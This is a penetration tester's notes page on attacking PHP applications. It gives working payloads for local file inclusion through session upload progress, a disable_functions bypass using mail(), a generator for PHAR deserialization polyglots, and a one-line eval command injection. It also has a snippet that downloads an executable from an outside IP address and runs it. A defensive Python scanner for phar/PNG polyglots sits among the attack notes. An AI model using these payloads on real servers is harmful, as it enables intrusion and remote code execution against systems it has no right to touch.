xct's notes
PHP

Dangerous Functions

PHP Temporary Files

PHP creates temporary files for files sent via POST and for sessions. If we have an LFI, we can get our PHP code onto the box this way and then include it.

PHP_SESSION_UPLOAD_PROGRESS (will create sess_xct in /tmp):

```shell
curl --path-as-is '127.0.0.1/' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F '[email protected]' -H 'Cookie: PHPSESSID=xct';
```

Disable Functions Bypass

Mail

```php
<?php
file_put_contents('/tmp/exploit',"whoami>/tmp/output");
mail("a","b","c","d","-H 'bash /tmp/exploit'");
?>
```

PHP7 Backtrace

Interesting Behavior

PHP's $_REQUEST takes its values from GET, POST and also COOKIE. This can lead to interesting behavior when GET/POST and COOKIE parameters of the same name are set to different values. Values from COOKIE are disabled by default though.

PHAR SSRF

If a file_exists() call or a similar filesystem function is applied to uploaded content, we can request that content via the phar:// wrapper. This lets us use deserialization gadgets.

```php
function generate_base_phar($o, $prefix){
    global $tempname;
    @unlink($tempname);
    $phar = new Phar($tempname);
    $phar->startBuffering();
    $phar->addFromString("test.txt", "$prefix xct_was_here");
    $phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o);
    $phar->stopBuffering();
    $basecontent = file_get_contents($tempname);
    @unlink($tempname);
    return $basecontent;
}

$object = new <Your Class>;
var_dump(serialize($object));

# prefix for faking a valid png
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
$tempname = 'temp.phar'; // make it phar
$outfile = 'out.png';
file_put_contents($outfile, generate_base_phar($object, $prefix));
```
If no good gadgets are available, SoapClient can be used to SSRF via gopher:// to other local services such as MySQL.
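From the defender's side, the two things worth checking are the uploaded bytes (a phar stub must end with `__HALT_COMPILER();`, and the polyglot above just prepends a PNG signature to it) and the user-supplied path (a `phar://` prefix routes it to the stream wrapper regardless of extension). The following scanner is an added example, not the page's code; the sample blobs and the `inspect_upload`/`is_wrapper_path` names are constructed for illustration.

```python
import re

# Every phar archive ends its stub with __HALT_COMPILER(); and the page's
# polyglot prepends the PNG signature so naive image checks pass.
PHAR_STUB = re.compile(rb"__HALT_COMPILER\s*\(\s*\)\s*;", re.IGNORECASE)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Any scheme prefix hands the path to a stream wrapper (phar://, data://, ...).
WRAPPER_PREFIX = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def inspect_upload(data: bytes, claimed_ext: str) -> list[str]:
    """Return findings for an uploaded blob; an empty list means nothing suspicious."""
    findings = []
    if claimed_ext.lower() == "png" and not data.startswith(PNG_MAGIC):
        findings.append("png extension without PNG signature")
    if PHAR_STUB.search(data):
        # The stub is stored uncompressed, so the marker survives even when
        # the archive's files are gzip/bzip2 compressed.
        findings.append("phar stub marker embedded")
        if data.startswith(PNG_MAGIC):
            findings.append("PNG/phar polyglot")
    return findings


def is_wrapper_path(path: str) -> bool:
    """True when a user-supplied path would be routed to a PHP stream wrapper."""
    return WRAPPER_PREFIX.match(path) is not None


# Constructed samples: a plain PNG header, a polyglot built the way the page's
# generate_base_phar() does (PNG prefix followed by the stub), and a bare phar.
CLEAN_PNG = PNG_MAGIC + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 16
POLYGLOT = PNG_MAGIC + b"<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 32
BARE_PHAR = b"<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PNG), ("polyglot", POLYGLOT), ("bare", BARE_PHAR)):
        print(name, inspect_upload(blob, "png") or "ok")
    for p in ("uploads/out.png", "phar://uploads/out.png/test.txt", "PHAR://x"):
        print(p, "-> wrapper" if is_wrapper_path(p) else "-> plain path")
```

Rejecting wrapper-prefixed paths before they reach file_exists() (or unregistering the phar wrapper with stream_wrapper_unregister('phar') where it is not needed) closes the trigger; the content check catches the polyglot at upload time.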

Eval Code Injection

Simple but effective:

```
${system($_GET[1])}&1=ls
```

Upload & Execute File

```php
<?php
$data = file_get_contents("http://10.10.14.51/xc.exe");
file_put_contents( "C:\\programdata\\xc_10.10.14.51_8080.exe", $data);
system("C:\\programdata\\xc_10.10.14.51_8080.exe");
?>
```